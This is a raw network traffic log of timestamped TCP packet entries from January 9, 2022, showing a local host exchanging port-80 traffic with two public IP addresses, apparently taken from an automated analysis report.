Jan 9, 2022 18:48:47.910643101 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910660982 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.910681963 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910721064 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910734892 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.910758018 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910795927 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910809994 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.910835028 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910872936 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910891056 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.910912037 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910948992 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.910964966 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.910986900 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911026001 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911041975 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.911063910 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911113977 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.911164045 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911202908 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911241055 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911254883 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.911427975 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911484003 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.911519051 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911669970 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911731005 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.911765099 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911931038 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.911995888 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.912046909 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.912149906 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.912199974 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.912261009 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.912338972 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.912388086 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.912475109 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.912638903 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.912691116 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.912775993 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.912812948 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.912866116 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.912965059 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.913117886 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.913166046 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.914220095 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.914258003 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.914309025 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.951134920 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.951179028 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:47.951287031 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:47.962383032 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:48.097263098 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.142739058 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.144126892 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.144299030 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:48.144927025 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:48.188194990 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.188247919 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.188283920 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.188323975 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.188379049 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.188410044 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.188457012 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.188496113 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.188540936 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.188580990 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.188788891 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.188843012 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.190730095 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.190781116 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.190818071 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.190840960 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.190855980 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.190893888 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.190907001 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.190932035 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.190972090 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.190979958 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.191008091 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.191046953 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.191059113 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.191085100 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.191122055 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.191134930 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.191159964 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.191210032 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.191291094 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.192706108 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.192761898 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.192766905 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.192799091 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.192837954 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.192873955 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.192908049 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.192948103 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.192958117 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.192985058 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193023920 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193041086 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.193062067 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193100929 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193104982 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.193140984 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193176985 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193182945 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.193216085 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193253040 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193260908 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.193289042 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193325996 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193330050 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.193363905 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193403006 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193408012 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.193442106 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193485975 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.193576097 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193664074 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193711996 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.193727970 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193882942 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.193932056 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.194084883 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.194123030 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.194174051 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.230185986 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.230242968 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.230309963 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.367363930 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.467427015 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.467480898 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.467674971 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.468036890 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.468138933 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.468266964 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.468375921 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.468381882 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.468591928 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.468633890 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.468666077 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.468688965 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.469896078 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.470024109 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.470077038 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.470166922 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.470222950 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.470276117 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.470325947 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.470484972 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.470586061 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.470626116 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.470642090 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.470833063 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.470889091 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.470930099 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.471066952 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.471122980 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.471170902 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.472367048 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.472454071 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.472465992 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.472606897 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.472664118 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.472709894 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.472865105 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.472922087 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.472973108 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.473109007 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.473161936 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.473221064 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.473359108 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.473417997 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.473469973 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.473606110 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.473643064 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.473683119 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.473701000 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.473771095 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.473810911 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.473867893 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.474016905 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.474114895 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.474174023 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.474236965 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.474277020 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.474328041 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.474417925 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.474528074 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.474586964 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.474685907 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.474781036 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.474834919 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.474875927 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.475017071 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.475076914 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.475580931 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.476161957 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.476217985 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.509300947 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.509355068 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.509392023 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.509502888 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.510534048 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.510592937 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.689198971 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.689255953 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.689296007 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.689333916 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.689372063 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.689395905 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:48.689412117 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.689439058 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:48.689450026 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.689474106 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:48.689491987 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.689529896 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.689567089 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:48.689585924 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:48.689625025 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:48.746715069 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.746767998 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.746808052 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.746845961 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.746860981 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.746903896 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.747401953 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.747513056 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.747612000 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.747662067 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.747724056 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.747885942 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.747939110 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.747982025 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.748022079 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.748034954 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.748115063 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.748176098 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.748285055 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.748521090 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.748560905 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.748575926 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.748661041 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.748714924 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.749073982 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.749169111 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.749248028 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.749279022 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.749393940 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.749449968 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.749491930 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.749620914 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.749660015 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.749732018 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.749769926 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.749861002 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.750016928 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.750056028 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.750092030 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.750108004 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.750196934 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.750255108 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.750403881 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.750595093 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.750634909 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.750726938 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.750775099 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.750823021 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.750843048 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.751002073 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.751058102 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.751147032 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.751184940 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.751233101 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.751296043 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.751339912 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.751456022 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.751601934 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.751709938 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.751749992 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.751806974 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.751854897 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.751990080 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.752047062 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.752094984 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.752147913 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.752208948 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.752504110 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.752543926 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.752578974 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.752614975 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.752618074 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.752636909 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.752707958 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.752839088 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.752878904 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.753065109 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.753120899 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.753175020 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.753212929 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.753345013 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.753398895 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.753459930 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.753499985 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.753614902 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.753659010 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.753705978 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.753833055 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.753957033 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.753993988 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.754012108 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.754158020 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.754199028 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.754224062 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.754437923 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.754478931 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.754503012 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.754564047 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.754702091 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.754741907 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.754749060 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.754796982 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.754875898 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.754982948 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.755094051 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.755151987 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.755249023 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.755353928 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.755413055 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.755458117 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.755589962 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.755645037 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.755772114 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.755811930 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.755830050 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.755894899 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.756031036 CET	80	49862	175.126.109.15	192.168.2.3
Jan 9, 2022 18:48:48.756089926 CET	49862	80	192.168.2.3	175.126.109.15
Jan 9, 2022 18:48:48.756155968 CET	80	49862	175.126.109.15	192.168.2.3
